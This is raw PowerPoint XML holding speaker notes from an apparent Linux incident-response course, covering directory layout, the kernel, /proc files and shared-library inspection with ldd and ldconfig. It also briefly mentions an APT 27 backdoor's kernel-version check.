            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service is abbreviated as ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>srv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘. This directory contains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server-specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>service-related </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sys: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modern Linux distributions include a /sys directory as a virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file system, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>which stores and allows modification of the devices connected to the system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: System’s temporary directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by users and root. Stores temporary files for user and system, till next boot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contains executable binaries, documentation, source code, libraries for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>second-level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>program. Confusingly, some system admin executables may instead reside in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/local/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> instead of /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sbin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> itself.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stands for variable. The contents of this file is expected to grow. This directory contains log, lock, spool, mail and temp files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Source: https://www.tecmint.com/linux-directory-structure-and-important-files-paths-explained</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1475534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type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Review slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2217208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Kernel is sometimes referred to as the supervisor, core or internals of the OS. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Kernel abstracts the underlying hardware from the software and provides a running environment for application software through system calls. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Kernel is the special piece of the OS with multiple components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> controls the CPU hardware, a memory management system to manage process address spaces, control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> interrupt handlers to service interrupt requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a scheduler to share processor time among</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> multiple processes and system services, such as networking and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>interprocess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> communication. All of this is intended to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run the applications and protects them from each other. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is the first program loaded on the computer when the computer starts up. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The most critical pieces of code in the Kernel are loaded into protected areas of memory (elevated system state/Kernel Space) with full access to the hardware, so that they cannot be overwritten by other applications running in the OS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>System Calls are special functions written for programmers to use in requesting the Kernel to perform functions on their behalf. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3101287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556816" y="882503"/>
            <a:ext cx="5888736" cy="7676210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> continued from previous page).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Linux is a monolithic Kernel: The Linux Kernel executes in a single address space entirely in Kernel mode. Monolithic Kernels are implemented entirely as a single process running in a single address space. This allows for all Kernel services to exist and execute in the large Kernel address space. This is different than a microkernel where functionality of the Kernel is broken down into separate processes, usually called servers. These are forced to communicate with and invoke services from each other by sending messages over the IPC mechanism. The lesson will discuss more of this later in the User Space and Kernel Space section.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kernel information is able to be found in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Procfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t>which is a virtual </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> that exists only in Kernel memory and is mounted at /proc. Reading or writing files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>procfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> invokes Kernel functions that simulate reading or writing from a real file. Th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e lesson will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> discuss more of /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" baseline="0" dirty="0" smtClean="0"/>
              <a:t> on the next slide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1617685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lesson will discuss Linux files later</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, but Linux stores data and treats everything as a file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many Linux tools are simply reading different files and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directories, such as files from within the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory, which was created to improve communication between users and the Kernel. It contains a hierarchy of special files representing the current state of the Kernel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Some of the files in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory may be manipulated by users and applications to communicate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> changes to the Kernel, these files have read-write… which have been used for nefarious purposes. For instance, those familiar with APT 27, Chinese intrusion set, they had a PWNLNX2 backdoor that would determine current OS and Kernel version from the file ‘/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>osrelease</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>’. If the version was less than or equal to 2.6.11, the backdoor would terminate. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>When conducting incident response on a Linux system, it is good to know what the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>proc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory provides. Listed are a few key directories in /proc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>cpuinfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: Contains CPU-related info.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>filesystems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: Holds info regarding file systems that are currently in use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/interrupts: Stores the interrupts that are currently being used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="937704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556816" y="893135"/>
            <a:ext cx="5888736" cy="7665577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Notes continued from previous page).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ioports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: List the I/O addresses used by devices connected to the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>meminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>: Contains memory usage info for both physical memory and swap.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/modules: Lists currently loaded Kernel modules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/mounts: Displays currently mounted file systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/stat: Contains various statistics about the system, such as the number of page faults since the system was last booted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/swaps: Holds swap file utilization information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/version: Contains Linux version info.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3824968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smtClean="0"/>
              <a:t>Next the lesson will examine libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in Linux.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34968447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programming, a library is an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> assortment of precompiled pieces of code that can be reused in a program (i.e., reusable functions, routines, classes, data structures, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>). These are utilized for both Windows and Linux environments. In Windows, DLL injection techniques are commonly used and there are plenty of resources on how to find/fix bad guys doing it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>In Linux it is also possible, so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the lesson wi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ll cover the same two class of libraries. Static libraries are bound at a program statically at compile time, while Dynamic or shared libraries are loaded when program is launched and loaded into memory and binding occurs at runtime. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Examples of libraries in Linux include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (standard C library) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>glibc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (GNU version of the standard C library), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>libcurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (multiprotocol file transfer library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>libcrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> (used for encryption, hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>encoding in C). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Shared libraries are loaded by ld.so (or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld.so.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) and ld-linux.so </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld-linux.so.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>) programs where x is the version. In Linux </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld-linux.so.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> searches and loads all shared libraries used by a program. They are utilizing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld.so.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file to find the location of where the library are located. These will normally point to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/local/lib, /lib32, /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/lib32, but can also be found elsewhere, which makes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> files a good place to reference. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="574292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556816" y="893135"/>
            <a:ext cx="5888736" cy="7665577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>(Notes continued from previous page).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>If you are conducting incident response and find a questionable executable and need to search its libraries, the LDD command can assist. LDD prints the shared objects (shared libraries) required by each program or shared object specified on the command line. The example is of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The other source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is parsing the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld.so.cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ldconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> command, which creates the necessary links and cache to the most recent shared libraries found in the directories specific on the command line, from the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld.so.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file and its trusted directories. The cache is used by the runtime linker, ld.so or </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ld-linux.so. </a:t>
            </a:r>
            <a:r>
